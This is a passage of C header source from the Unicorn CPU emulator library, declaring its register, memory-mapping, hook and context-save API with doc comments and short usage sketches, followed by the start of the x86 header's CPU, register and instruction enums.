 Return a string describing the given error code.

 @code: error code (see UC_ERR_* above)

 @return: returns a pointer to a string that describes the error code passed
   in the argument @code
*/
UNICORN_EXPORT
const char *uc_strerror(uc_err code);

/*
 Write to register.

 @uc: handle returned by uc_open()
 @regid: register ID that is to be modified.
 @value: pointer to the value that will be written to register @regid

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_reg_write(uc_engine *uc, int regid, const void *value);

/*
 Read register value.

 @uc: handle returned by uc_open()
 @regid: register ID that is to be retrieved.
 @value: pointer to a variable storing the register value.

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_reg_read(uc_engine *uc, int regid, void *value);

/*
 Write to register.

 @uc: handle returned by uc_open()
 @regid: register ID that is to be modified.
 @value: pointer to the value that will be written to register @regid
 @size: size of value being written; on return, size of value written

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid; UC_ERR_OVERFLOW if value is not large enough for the register.
*/
UNICORN_EXPORT
uc_err uc_reg_write2(uc_engine *uc, int regid, const void *value,
                     size_t *size);

/*
 Read register value.

 @uc: handle returned by uc_open()
 @regid: register ID that is to be retrieved.
 @value: pointer to a variable storing the register value.
 @size: size of value buffer; on return, size of value read

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid; UC_ERR_OVERFLOW if value is not large enough to hold the register.
*/
UNICORN_EXPORT
uc_err uc_reg_read2(uc_engine *uc, int regid, void *value, size_t *size);

/*
 Write multiple register values.

 @uc: handle returned by uc_open()
 @regs: array of register IDs to store
 @vals: array of pointers to register values
 @count: length of both *regs and *vals

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals,
                          int count);
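/* Illustrative sketch (not part of this header): uc_reg_write()/uc_reg_read()
   take a pointer sized for the register, e.g. on a 64-bit RISC-V engine:

       uint64_t a0 = 42;
       uc_reg_write(uc, UC_RISCV_REG_A0, &a0);
       a0 = 0;
       uc_reg_read(uc, UC_RISCV_REG_A0, &a0); // a0 == 42 again
*/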
/*
 Read multiple register values.

 @uc: handle returned by uc_open()
 @regs: array of register IDs to retrieve
 @vals: array of pointers to register values
 @count: length of both *regs and *vals

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count);

/*
 Write multiple register values.

 @uc: handle returned by uc_open()
 @regs: array of register IDs to store
 @value: array of pointers to register values
 @sizes: array of sizes of each value; on return, sizes of each stored
   register
 @count: length of *regs, *vals and *sizes

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid; UC_ERR_OVERFLOW if some value is not large enough for the
   corresponding register.
*/
UNICORN_EXPORT
uc_err uc_reg_write_batch2(uc_engine *uc, int *regs, const void *const *vals,
                           size_t *sizes, int count);

/*
 Read multiple register values.

 @uc: handle returned by uc_open()
 @regs: array of register IDs to retrieve
 @value: pointer to array of values to hold registers
 @sizes: array of sizes of each value; on return, sizes of each retrieved
   register
 @count: length of *regs, *vals and *sizes

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid; UC_ERR_OVERFLOW if some value is not large enough to hold the
   corresponding register.
*/
UNICORN_EXPORT
uc_err uc_reg_read_batch2(uc_engine *uc, int *regs, void *const *vals,
                          size_t *sizes, int count);

/*
 Write to a range of bytes in memory.

 @uc: handle returned by uc_open()
 @address: starting memory address of bytes to set.
 @bytes: pointer to a variable containing data to be written to memory.
 @size: size of memory to write to.

 NOTE: @bytes must be big enough to contain @size bytes.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes,
                    size_t size);

/*
 Read a range of bytes in memory.

 @uc: handle returned by uc_open()
 @address: starting memory address of bytes to get.
 @bytes: pointer to a variable containing data copied from memory.
 @size: size of memory to read.

 NOTE: @bytes must be big enough to contain @size bytes.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size);

/*
 Emulate machine code in a specific duration of time.

 @uc: handle returned by uc_open()
 @begin: address where emulation starts
 @until: address where emulation stops (i.e. when this address is hit)
 @timeout: duration to emulate the code (in microseconds). When this value is
   0, we will emulate the code in infinite time, until the code is finished.
 @count: the number of instructions to be emulated. When this value is 0, we
   will emulate all the code available, until the code is finished.

 NOTE: The internal states of the engine are guaranteed to be correct if and
   only if uc_emu_start returns without any errors, or errors have been
   handled in the callbacks.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until,
                    uint64_t timeout, size_t count);
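/* Illustrative sketch of a minimal emulation run: map a page, place code in
   it, then execute it. Assumes an engine opened with UC_ARCH_ARM /
   UC_MODE_THUMB; the two bytes are a Thumb "nop", the base address is
   arbitrary, and uc_mem_map()/UC_PROT_ALL are declared further below:

       #define BASE 0x1000
       const uint8_t code[] = {0x00, 0xbf}; // Thumb nop
       uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL);
       uc_mem_write(uc, BASE, code, sizeof(code));
       // bit 0 of @begin selects Thumb state on ARM
       uc_emu_start(uc, BASE | 1, BASE + sizeof(code), 0, 0);
*/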
/*
 Stop emulation (which was started by the uc_emu_start() API).
 This is typically called from callback functions registered via tracing
 APIs.

 @uc: handle returned by uc_open()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_emu_stop(uc_engine *uc);

/*
 Register callback for a hook event.
 The callback will be run when the hook event is hit.

 @uc: handle returned by uc_open()
 @hh: hook handle returned from this registration. To be used in uc_hook_del()
   API
 @type: hook type, refer to uc_hook_type enum
 @callback: callback to be run when instruction is hit
 @user_data: user-defined data. This will be passed to callback function in
   its last argument @user_data
 @begin: start address of the area where the callback is in effect (inclusive)
 @end: end address of the area where the callback is in effect (inclusive)
   NOTE 1: the callback is called only if related address is in range [@begin,
     @end]
   NOTE 2: if @begin > @end, callback is called whenever this hook type is
     triggered
 @...: variable arguments (depending on @type)
   NOTE: if @type = UC_HOOK_INSN, this is the instruction ID.
     currently, only x86 in, out, syscall, sysenter, cpuid are supported.
   NOTE: if @type = UC_HOOK_TCG_OPCODE, arguments are @opcode and @flags. See
     @uc_tcg_op_code and @uc_tcg_op_flag for details.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback,
                   void *user_data, uint64_t begin, uint64_t end, ...);

/*
 Unregister (remove) a hook callback.
 This API removes the hook callback registered by uc_hook_add().
 NOTE: this should be called only when you no longer want to trace.
 After this, @hh is invalid, and no longer usable.

 @uc: handle returned by uc_open()
 @hh: handle returned by uc_hook_add()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_hook_del(uc_engine *uc, uc_hook hh);

typedef enum uc_prot {
    UC_PROT_NONE = 0,
    UC_PROT_READ = 1,
    UC_PROT_WRITE = 2,
    UC_PROT_EXEC = 4,
    UC_PROT_ALL = 7,
} uc_prot;

struct uc_tlb_entry {
    uint64_t paddr;
    uc_prot perms;
};

typedef enum uc_context_content {
    UC_CTL_CONTEXT_CPU = 1,
    UC_CTL_CONTEXT_MEMORY = 2,
} uc_context_content;

/*
 Map memory in for emulation.
 This API adds a memory region that can be used by emulation.

 @uc: handle returned by uc_open()
 @address: starting address of the new memory region to be mapped in.
   This address must be aligned to 4KB, or this will return with UC_ERR_ARG
   error.
 @size: size of the new memory region to be mapped in.
   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG
   error.
 @perms: Permissions for the newly mapped region.
   This must be some combination of UC_PROT_READ | UC_PROT_WRITE |
   UC_PROT_EXEC, or this will return with UC_ERR_ARG error.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size,
                  uint32_t perms);
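/* Illustrative sketch (not part of this header): a UC_HOOK_TLB_FILL handler
   matching uc_cb_tlbevent_t, usable once the engine runs with UC_TLB_VIRTUAL
   (see uc_ctl_tlb_mode above); it maps every virtual page onto itself with
   full permissions:

       static bool tlb_fill(uc_engine *uc, uint64_t vaddr, uc_mem_type type,
                            uc_tlb_entry *result, void *user_data)
       {
           result->paddr = vaddr;       // identity mapping
           result->perms = UC_PROT_ALL;
           return true;                 // entry found
       }
*/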
/*
 Map existing host memory in for emulation.
 This API adds a memory region that can be used by emulation.

 @uc: handle returned by uc_open()
 @address: starting address of the new memory region to be mapped in.
   This address must be aligned to 4KB, or this will return with UC_ERR_ARG
   error.
 @size: size of the new memory region to be mapped in.
   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG
   error.
 @perms: Permissions for the newly mapped region.
   This must be some combination of UC_PROT_READ | UC_PROT_WRITE |
   UC_PROT_EXEC, or this will return with UC_ERR_ARG error.
 @ptr: pointer to host memory backing the newly mapped memory. This host
   memory is expected to be an equal or larger size than provided, and be
   mapped with at least PROT_READ | PROT_WRITE. If it is not, the resulting
   behavior is undefined.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size,
                      uint32_t perms, void *ptr);

/*
 Map MMIO in for emulation.
 This API adds a MMIO region that can be used by emulation.

 @uc: handle returned by uc_open()
 @address: starting address of the new MMIO region to be mapped in.
   This address must be aligned to 4KB, or this will return with UC_ERR_ARG
   error.
 @size: size of the new MMIO region to be mapped in.
   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG
   error.
 @read_cb: function for handling reads from this MMIO region.
 @user_data_read: user-defined data. This will be passed to @read_cb function
   in its last argument @user_data
 @write_cb: function for handling writes to this MMIO region.
 @user_data_write: user-defined data. This will be passed to @write_cb
   function in its last argument @user_data

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mmio_map(uc_engine *uc, uint64_t address, size_t size,
                   uc_cb_mmio_read_t read_cb, void *user_data_read,
                   uc_cb_mmio_write_t write_cb, void *user_data_write);

/*
 Unmap a region of emulation memory.
 This API deletes a memory mapping from the emulation memory space.

 @uc: handle returned by uc_open()
 @address: starting address of the memory region to be unmapped.
   This address must be aligned to 4KB, or this will return with UC_ERR_ARG
   error.
 @size: size of the memory region to be modified.
   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG
   error.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size);

/*
 Set memory permissions for emulation memory.
 This API changes permissions on an existing memory region.

 @uc: handle returned by uc_open()
 @address: starting address of the memory region to be modified.
   This address must be aligned to 4KB, or this will return with UC_ERR_ARG
   error.
 @size: size of the memory region to be modified.
   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG
   error.
 @perms: New permissions for the mapped region.
   This must be some combination of UC_PROT_READ | UC_PROT_WRITE |
   UC_PROT_EXEC, or this will return with UC_ERR_ARG error.

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size,
                      uint32_t perms);
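/* Illustrative sketch wiring the hypothetical dev_read/dev_write handlers
   from the MMIO callback sketch earlier into the address space; the base
   address is arbitrary:

       uc_mmio_map(uc, 0xf0000000, 0x1000, dev_read, NULL, dev_write, NULL);
*/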
/*
 Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr().
 This API allocates memory for @regions, and user must free this memory later
 by uc_free() to avoid leaking memory.
 NOTE: memory regions may be split by uc_mem_unmap()

 @uc: handle returned by uc_open()
 @regions: pointer to an array of uc_mem_region struct. This is allocated by
   Unicorn, and must be freed by user later with uc_free()
 @count: pointer to number of struct uc_mem_region contained in @regions

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count);

/*
 Allocate a region that can be used with uc_context_{save,restore} to perform
 quick save/rollback of the CPU context, which includes registers and some
 internal metadata. Contexts may not be shared across engine instances with
 differing arches or modes.

 @uc: handle returned by uc_open()
 @context: pointer to a uc_context*. This will be updated with the pointer to
   the new context on successful return of this function.
   Later, this allocated memory must be freed with uc_context_free().

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_alloc(uc_engine *uc, uc_context **context);

/*
 Free the memory allocated by uc_mem_regions.
 WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc
 should be freed by uc_context_free(). Calling uc_free() may still work, but
 the result is **undefined**.

 @mem: memory allocated by uc_mem_regions (returned in *regions).

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_free(void *mem);

/*
 Save a copy of the internal CPU context.
 This API should be used to efficiently make or update a saved copy of the
 internal CPU state.

 @uc: handle returned by uc_open()
 @context: handle returned by uc_context_alloc()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_save(uc_engine *uc, uc_context *context);

/*
 Write value to a register of a context.

 @ctx: handle returned by uc_context_alloc()
 @regid: register ID that is to be modified.
 @value: pointer to the value that will be written to register @regid

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_context_reg_write(uc_context *ctx, int regid, const void *value);

/*
 Read register value from a context.

 @ctx: handle returned by uc_context_alloc()
 @regid: register ID that is to be retrieved.
 @value: pointer to a variable storing the register value.

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid
*/
UNICORN_EXPORT
uc_err uc_context_reg_read(uc_context *ctx, int regid, void *value);

/*
 Write value to a register of a context.

 @ctx: handle returned by uc_context_alloc()
 @regid: register ID that is to be modified.
 @value: pointer to the value that will be written to register @regid
 @size: size of value being written; on return, size of value written

 @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is
   invalid; UC_ERR_OVERFLOW if value is not large enough for the register.
*/
UNICORN_EXPORT
uc_err uc_context_reg_write2(uc_context *ctx, int regid, const void *value,
                             size_t *size);
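/* Illustrative sketch of a save/rollback cycle with the context API
   (uc_context_restore() is declared further below):

       uc_context *ctx;
       uc_context_alloc(uc, &ctx);
       uc_context_save(uc, ctx);    // snapshot registers
       // ... emulate ...
       uc_context_restore(uc, ctx); // roll back to the snapshot
       uc_context_free(ctx);
*/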
/*
 Write multiple register values to registers of a context.

 @ctx: handle returned by uc_context_alloc()
 @regs: array of register IDs to store
 @vals: pointer to an array of register values
 @count: length of both *regs and *vals

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_reg_write_batch(uc_context *ctx, int *regs,
                                  void *const *vals, int count);

/*
 Read multiple register values from a context.

 @ctx: handle returned by uc_context_alloc()
 @regs: array of register IDs to retrieve
 @vals: pointer to an array of values to hold the registers
 @count: length of both *regs and *vals

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_reg_read_batch(uc_context *ctx, int *regs, void **vals,
                                 int count);

/*
 Write multiple register values to registers of a context.

 @ctx: handle returned by uc_context_alloc()
 @regs: array of register IDs to store
 @vals: array of pointers to register values
 @sizes: array of sizes of each value; on return, sizes of each stored
   register
 @count: length of *regs, *vals and *sizes

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid; UC_ERR_OVERFLOW if some value is not large enough for the
   corresponding register.
*/
UNICORN_EXPORT
uc_err uc_context_reg_write_batch2(uc_context *ctx, int *regs,
                                   const void *const *vals, size_t *sizes,
                                   int count);

/*
 Read multiple register values from a context.

 @ctx: handle returned by uc_context_alloc()
 @regs: array of register IDs to retrieve
 @vals: pointer to an array of values to hold the registers
 @sizes: array of sizes of each value; on return, sizes of each retrieved
   register
 @count: length of *regs, *vals and *sizes

 @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is
   invalid; UC_ERR_OVERFLOW if some value is not large enough to hold the
   corresponding register.
*/
UNICORN_EXPORT
uc_err uc_context_reg_read_batch2(uc_context *ctx, int *regs,
                                  void *const *vals, size_t *sizes, int count);

/*
 Restore the current CPU context from a saved copy.
 This API should be used to roll the CPU context back to a previous state
 saved by uc_context_save().

 @uc: handle returned by uc_open()
 @context: handle returned by uc_context_alloc() that has been used with
   uc_context_save()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_restore(uc_engine *uc, uc_context *context);

/*
 Return the size needed to store the CPU context. Can be used to allocate a
 buffer to contain the CPU context and directly call uc_context_save.

 @uc: handle returned by uc_open()

 @return the size needed to store the CPU context, as a size_t.
*/
UNICORN_EXPORT
size_t uc_context_size(uc_engine *uc);
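/*
 Usage sketch (illustrative only, not part of this header): snapshot the CPU
 state, emulate, then roll back. Assumes a valid handle from uc_open();
 error handling is omitted for brevity.
*/
#if 0
static void example_context_roundtrip(uc_engine *uc)
{
    uc_context *ctx;

    uc_context_alloc(uc, &ctx);  /* uc_context_size(uc) reports its size */
    uc_context_save(uc, ctx);    /* snapshot the current CPU state */

    /* ... run emulation that mutates registers ... */

    uc_context_restore(uc, ctx); /* roll back to the snapshot */
    uc_context_free(ctx);        /* free with uc_context_free(), not uc_free() */
}
#endif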
/*
 Free the context allocated by uc_context_alloc().

 @context: handle returned by uc_context_alloc()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_context_free(uc_context *context);

#ifdef __cplusplus
}
#endif

#endif

unicorn-2.1.1/include/unicorn/x86.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_X86_H
#define UNICORN_X86_H

#ifdef __cplusplus
extern "C" {
#endif

#include "platform.h"

//> X86 CPU
typedef enum uc_cpu_x86 {
    UC_CPU_X86_QEMU64 = 0,
    UC_CPU_X86_PHENOM,
    UC_CPU_X86_CORE2DUO,
    UC_CPU_X86_KVM64,
    UC_CPU_X86_QEMU32,
    UC_CPU_X86_KVM32,
    UC_CPU_X86_COREDUO,
    UC_CPU_X86_486,
    UC_CPU_X86_PENTIUM,
    UC_CPU_X86_PENTIUM2,
    UC_CPU_X86_PENTIUM3,
    UC_CPU_X86_ATHLON,
    UC_CPU_X86_N270,
    UC_CPU_X86_CONROE,
    UC_CPU_X86_PENRYN,
    UC_CPU_X86_NEHALEM,
    UC_CPU_X86_WESTMERE,
    UC_CPU_X86_SANDYBRIDGE,
    UC_CPU_X86_IVYBRIDGE,
    UC_CPU_X86_HASWELL,
    UC_CPU_X86_BROADWELL,
    UC_CPU_X86_SKYLAKE_CLIENT,
    UC_CPU_X86_SKYLAKE_SERVER,
    UC_CPU_X86_CASCADELAKE_SERVER,
    UC_CPU_X86_COOPERLAKE,
    UC_CPU_X86_ICELAKE_CLIENT,
    UC_CPU_X86_ICELAKE_SERVER,
    UC_CPU_X86_DENVERTON,
    UC_CPU_X86_SNOWRIDGE,
    UC_CPU_X86_KNIGHTSMILL,
    UC_CPU_X86_OPTERON_G1,
    UC_CPU_X86_OPTERON_G2,
    UC_CPU_X86_OPTERON_G3,
    UC_CPU_X86_OPTERON_G4,
    UC_CPU_X86_OPTERON_G5,
    UC_CPU_X86_EPYC,
    UC_CPU_X86_DHYANA,
    UC_CPU_X86_EPYC_ROME,
    UC_CPU_X86_ENDING
} uc_cpu_x86;

// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR.
// Borrowed from SegmentCache in qemu/target-i386/cpu.h
typedef struct uc_x86_mmr {
    uint16_t selector; /* not used by GDTR and IDTR */
    uint64_t base;     /* handle 32 or 64 bit CPUs */
    uint32_t limit;
    uint32_t flags;    /* not used by GDTR and IDTR */
} uc_x86_mmr;

// Model-Specific Register structure, use this with UC_X86_REG_MSR (as the
// register ID) in calls to uc_reg_write/uc_reg_read() to manipulate MSRs.
typedef struct uc_x86_msr {
    uint32_t rid;   // MSR id
    uint64_t value; // MSR value
} uc_x86_msr;

// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr())
// @user_data: user data passed to tracing APIs.
typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data);

// Callback function for tracing cpuid (for uc_hook_intr())
// @user_data: user data passed to tracing APIs.
//
// @return: true indicates the callback overwrites the cpuid instruction,
// while false indicates the cpuid instruction will still be executed.
typedef int (*uc_cb_insn_cpuid_t)(struct uc_struct *uc, void *user_data); //> X86 registers typedef enum uc_x86_reg { UC_X86_REG_INVALID = 0, UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, UC_X86_REG_EIP, UC_X86_REG_ES = UC_X86_REG_EIP + 2, UC_X86_REG_ESI, UC_X86_REG_ESP, UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RIP, UC_X86_REG_RSI = UC_X86_REG_RIP + 2, UC_X86_REG_RSP, UC_X86_REG_SI, UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR8 = UC_X86_REG_CR4 + 4, UC_X86_REG_DR0 = UC_X86_REG_CR8 + 8, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_FP0 = UC_X86_REG_DR7 + 9, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, UC_X86_REG_XMM13, UC_X86_REG_XMM14, UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, UC_X86_REG_ZMM31, UC_X86_REG_R8B, 
UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, UC_X86_REG_R15B, UC_X86_REG_R8D, UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, UC_X86_REG_FPTAG, UC_X86_REG_MSR, // Model-Specific Register UC_X86_REG_MXCSR, UC_X86_REG_FS_BASE, // Base regs for x86_64 UC_X86_REG_GS_BASE, UC_X86_REG_FLAGS, UC_X86_REG_RFLAGS, UC_X86_REG_FIP, UC_X86_REG_FCS, UC_X86_REG_FDP, UC_X86_REG_FDS, UC_X86_REG_FOP, UC_X86_REG_ENDING // <-- mark the end of the list of registers } uc_x86_reg; //> X86 instructions typedef enum uc_x86_insn { UC_X86_INS_INVALID = 0, UC_X86_INS_AAA, UC_X86_INS_AAD, UC_X86_INS_AAM, UC_X86_INS_AAS, UC_X86_INS_FABS, UC_X86_INS_ADC, UC_X86_INS_ADCX, UC_X86_INS_ADD, UC_X86_INS_ADDPD, UC_X86_INS_ADDPS, UC_X86_INS_ADDSD, UC_X86_INS_ADDSS, UC_X86_INS_ADDSUBPD, UC_X86_INS_ADDSUBPS, UC_X86_INS_FADD, UC_X86_INS_FIADD, UC_X86_INS_FADDP, UC_X86_INS_ADOX, UC_X86_INS_AESDECLAST, UC_X86_INS_AESDEC, UC_X86_INS_AESENCLAST, UC_X86_INS_AESENC, UC_X86_INS_AESIMC, UC_X86_INS_AESKEYGENASSIST, UC_X86_INS_AND, UC_X86_INS_ANDN, UC_X86_INS_ANDNPD, UC_X86_INS_ANDNPS, UC_X86_INS_ANDPD, UC_X86_INS_ANDPS, UC_X86_INS_ARPL, UC_X86_INS_BEXTR, UC_X86_INS_BLCFILL, UC_X86_INS_BLCI, UC_X86_INS_BLCIC, UC_X86_INS_BLCMSK, UC_X86_INS_BLCS, UC_X86_INS_BLENDPD, UC_X86_INS_BLENDPS, UC_X86_INS_BLENDVPD, UC_X86_INS_BLENDVPS, UC_X86_INS_BLSFILL, UC_X86_INS_BLSI, UC_X86_INS_BLSIC, UC_X86_INS_BLSMSK, UC_X86_INS_BLSR, UC_X86_INS_BOUND, UC_X86_INS_BSF, UC_X86_INS_BSR, UC_X86_INS_BSWAP, UC_X86_INS_BT, UC_X86_INS_BTC, UC_X86_INS_BTR, 